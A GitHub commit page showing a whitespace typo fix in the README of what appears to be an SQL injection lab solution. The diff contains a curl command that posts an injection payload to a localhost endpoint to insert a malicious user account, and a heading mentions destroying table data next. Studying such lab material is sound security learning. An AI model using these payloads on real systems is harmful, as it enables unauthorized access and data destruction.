Skip to content

Commit

Permalink
fixing typo
Browse files Browse the repository at this point in the history 
Signed-off-by: Andrew Steurer <[email protected]>
  • Loading branch information
Andrew Steurer committed Aug 14, 2024
1 parent 1ce2916 commit c65d017
Showing 1 changed file with 4 additions and 4 deletions.
8 changes: 4 additions & 4 deletions solution/README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -93,10 +93,10 @@ To break down each step of the statement:
Because the entrypoint for the data is in the body of the request, the SQL statement will need to be sent as a string in the body of the request. Below is the curl request that will insert a malicious user into the users table:
```sh
curl \
--request POST \
--data-binary "', 1); INSERT INTO users (username, password) VALUES ('maliciousUser', 'p@$$w0rd'); --" \
http://localhost:3000/message/1
curl \
--request POST \
--data-binary "', 1); INSERT INTO users (username, password) VALUES ('maliciousUser', 'p@$$w0rd'); --" \
http://localhost:3000/message/1
```

## Destroying the table data in the database
Expand Down

0 comments on commit c65d017

Please sign in to comment.